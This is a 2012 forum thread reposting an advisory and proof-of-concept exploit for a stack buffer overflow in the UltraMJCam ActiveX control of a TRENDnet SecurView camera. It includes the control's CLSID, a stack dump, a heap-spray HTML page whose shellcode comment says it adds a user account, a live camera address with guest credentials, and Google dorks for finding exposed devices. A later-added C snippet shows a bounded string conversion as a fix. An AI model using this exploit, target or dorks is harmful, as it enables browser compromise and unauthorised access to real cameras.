The_Arhitect Posted March 29, 2012

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest

Background:

The mentioned product, when browsing the device web interface, asks to install an ActiveX control to stream video content. It has the following settings:

File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

Vulnerability:

This ActiveX control exposed the vulnerable OpenFileDlg() method, see typelib:

...
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
    /* VT_BSTR [8] [in] */ $sFilter
    )
{
    /* method OpenFileDlg */
}
...

By invoking this method with an overlong argument, it is possible to overflow a buffer.
This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx:

Call stack of main thread
Address    Stack      Procedure / arguments              Called from          Frame
001279FC   77E6F20B   kernel32.77E637DE                  kernel32.77E6F206    00127A0C
00127A10   0299F958   kernel32.WideCharToMultiByte       UltraMJC.0299F952    00127A0C
00127A14   00000003     CodePage = 3
00127A18   00000000     Options = 0
00127A1C   03835C5C     WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
00127A20   FFFFFFFF     WideCharCount = FFFFFFFF (-1.)
00127A24   00127A50     MultiByteStr = 00127A50
00127A28   00007532     MultiByteCount = 7532 (30002.)
00127A2C   00000000     pDefaultChar = NULL
00127A30   00000000     pDefaultCharUsed = NULL
00127A3C   029B11D0   UltraMJC.0299F920                  UltraMJC.029B11CB    00127A38

...
0299F934   8B45 08          mov eax,dword ptr ss:[ebp+8]
0299F937   C600 00          mov byte ptr ds:[eax],0
0299F93A   6A 00            push 0
0299F93C   6A 00            push 0
0299F93E   8B4D 10          mov ecx,dword ptr ss:[ebp+10]
0299F941   51               push ecx
0299F942   8B55 08          mov edx,dword ptr ss:[ebp+8]
0299F945   52               push edx
0299F946   6A FF            push -1
0299F948   8B45 0C          mov eax,dword ptr ss:[ebp+C]
0299F94B   50               push eax
0299F94C   6A 00            push 0
0299F94E   8B4D 14          mov ecx,dword ptr ss:[ebp+14]
0299F951   51               push ecx
0299F952   FF15 20319F02    call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------
...

The result is that critical structures are overwritten (SEH) allowing to execute arbitrary code against the target browser.

As attachment, basic proof of concept code.

<!--
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc
IE7-nodep

camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("[encoded payload omitted]");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1888;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x ="";
for (i=0; i<15000; i++){
 x = x + "&";
}
obj.OpenFileDlg(x);
</script>

Source: TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
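Added example, not part of the original post, the advisory or UltraMJCamX.ocx: the stack dump above shows the conversion called with WideCharCount = -1 and MultiByteCount = 30002 for a destination on the stack, so the sketch below shows the bounded form of that pattern, where the required size is queried first and compared against the destination's real capacity. It uses the portable wcstombs() in place of WideCharToMultiByte(); the 260-byte buffer and the function names are assumptions.

```c
#include <stddef.h>
#include <stdlib.h>
#include <wchar.h>

#define FILTER_CAP 260  /* assumed size of the local destination buffer */

/* Convert src into dst without ever writing past dst_cap bytes.
 * Returns the number of bytes written (excluding the terminator),
 * or -1 if the input is invalid or does not fit. */
static long narrow_bounded(const wchar_t *src, char *dst, size_t dst_cap)
{
    if (src == NULL || dst == NULL || dst_cap == 0)
        return -1;
    dst[0] = '\0';

    /* Size query: with a NULL destination wcstombs() only counts bytes. */
    size_t need = wcstombs(NULL, src, 0);
    if (need == (size_t)-1)        /* character with no narrow encoding */
        return -1;
    if (need >= dst_cap)           /* no room for data plus terminator */
        return -1;                 /* reject instead of truncating */

    size_t wrote = wcstombs(dst, src, dst_cap);
    if (wrote == (size_t)-1 || wrote != need) {
        dst[0] = '\0';
        return -1;
    }
    dst[wrote] = '\0';
    return (long)wrote;
}

/* Constructed input shaped like the PoC argument: n copies of L'&'. */
static long try_filter(size_t n)
{
    char filter[FILTER_CAP];       /* the limit passed below is sizeof filter */
    wchar_t *arg = malloc((n + 1) * sizeof *arg);
    if (arg == NULL)
        return -1;
    wmemset(arg, L'&', n);
    arg[n] = L'\0';
    long r = narrow_bounded(arg, filter, sizeof filter);
    free(arg);
    return r;
}

int main(void)
{
    /* The 15000-character argument is refused; a short filter converts. */
    return (try_filter(15000) == -1 && try_filter(10) == 10) ? 0 : 1;
}
```

The limit handed to the conversion is always `sizeof` the real destination, never a separate constant, which is the property missing from the call in the dump.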
backdoor Posted April 2, 2012

Google Dork
inurl:admin/view.cgi intitle:Wireless

other models
inurl:admin/view.cgi intitle:Camera
napoletanii Posted April 2, 2012

A stupid thing worth remembering, sorry for the off-topic but I couldn't help myself.